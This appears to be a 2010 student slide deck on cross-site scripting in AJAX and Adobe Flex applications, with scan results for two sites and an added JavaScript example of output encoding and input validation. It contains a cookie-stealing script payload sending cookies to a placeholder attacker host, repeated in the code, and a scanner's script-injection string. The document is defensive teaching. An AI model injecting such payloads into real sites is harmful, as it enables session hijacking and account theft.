Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications
Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management
What is Cross-Site Scripting?
Cross-Site Scripting, or XSS (not to be confused with CSS, Cascading Style Sheets), allows attackers to inject client-side script into a web page.
The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash, into an application to try to gain access to sensitive information.
Dynamic websites (using AJAX or Flex, for example) are vulnerable. Static websites are not at risk.
Diagram of XSS Attack
*Diagram from CGISecurity.com
XSS Compared to Other Vulnerabilities
XSS is the #1 website security issue, with a 66% likelihood that a given website has the vulnerability:
Statistics from the WhiteHat Website Security Statistics Report, Fall 2009 edition
XSS Types
Two types of XSS attacks:
◦ Non-Altering (or Non-Persistent): causes no change to the page functionality
◦ Altering (or Persistent): a script injection that can be placed permanently in the database, causing a change to the page functionality that persists each time the page is requested
Non-Altering (Non-Persistent)
An attacker can take a URL that contains personal data, e.g. www.website.com/username=danielle, and modify the username field by entering JavaScript that steals the cookie, altering the URL to www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>
To diminish suspicion, the attacker can URL-encode the JavaScript so it is not apparent.
Altering (Persistent)
Within a forum, users' posts may be stored in a database, usually tracked by a session ID cookie.
An attacker can post a message containing malicious script that, if another user reads it, may compromise that user's account.
Threat to AJAX
Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS. From AJAX: The Definitive Guide:
◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.
◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”
Threat to Adobe Flex
Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application.
However, Adobe, realizing the threat, has strict security in place to prevent XSS:
◦ By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application.
◦ Since a Flex application is compiled into a SWF, it cannot itself be vulnerable to XSS.
◦ The sandbox security model prevents private information from being sent elsewhere.
Testing for XSS Vulnerabilities
Acunetix Web Vulnerability Scanner – a tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications)
HP SWFScan – a tool that helps find security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, then analyzes it for vulnerabilities.
Testing AJAX Application
Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities.
Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET parameter named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>
Testing AJAX
Testing Flex
Using HP SWFScan, the Flex application Sherwin Williams Color Visualizer (www.sherwin-williams.com/visualizer) was tested.
No XSS vulnerabilities were found.
Testing Flex
Conclusion
XSS can be both damaging and costly while compromising user security.
XSS is a bigger risk to AJAX, due to its JavaScript and client-side scripting.
Flex is vulnerable but a lot more resistant, due to Adobe's security features.
Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn't include script.
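As an added example (not from the slides), the non-persistent case from the earlier slide and the conclusion's advice to validate input, worked through in JavaScript: a greeting page that reflects the slide's username parameter, first concatenated raw and then with HTML output encoding plus an allow-list check. The URLs, the allow-list policy and the function names are constructed for this example; the cookie-stealing payload is the one shown on the slide.

```javascript
// Read a query parameter. URL decoding happens here, so the URL-encoded
// payload trick from the slide does not hide anything from the application.
function extractParam(pageUrl, name) {
  return new URL(pageUrl).searchParams.get(name);
}

// Vulnerable pattern: the raw parameter is concatenated into markup, so a
// <script> element inside it becomes part of the page and runs.
function renderGreetingUnsafe(username) {
  return "<h1>Welcome, " + username + "</h1>";
}

// Output encoding: every character HTML could interpret becomes an entity.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Hardened pattern: the value is displayed as text, never parsed as HTML.
function renderGreetingSafe(username) {
  return "<h1>Welcome, " + escapeHtml(username) + "</h1>";
}

// Input validation with an allow-list (assumed policy for this example:
// short alphanumeric names). Reject rather than try to strip script out.
const USERNAME_RE = /^[A-Za-z0-9_]{1,32}$/;
function isValidUsername(value) {
  return typeof value === "string" && USERNAME_RE.test(value);
}

// Constructed sample requests: the benign link and the slide's cookie-stealing
// payload, URL-encoded the way the slide says an attacker would disguise it.
const PAYLOAD =
  "<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>";
const BENIGN_URL = "http://www.website.com/?username=danielle";
const ATTACK_URL = "http://www.website.com/?username=" + encodeURIComponent(PAYLOAD);

// Run one request through both rendering paths and the validation check.
function handleRequest(pageUrl) {
  const username = extractParam(pageUrl, "username");
  return {
    valid: isValidUsername(username),
    unsafeHtml: renderGreetingUnsafe(username),
    safeHtml: renderGreetingSafe(username),
  };
}
```

The unsafe path emits the decoded script element verbatim; the safe path shows it as inert text, and the allow-list rejects the request before rendering at all.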
References
Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from http://www.acunetix.com/vulnerability-scanner/download.htm
Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html
Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf
Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from http://www.cgisecurity.com/xss-faq.html
Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html
Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: O'Reilly Media
WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf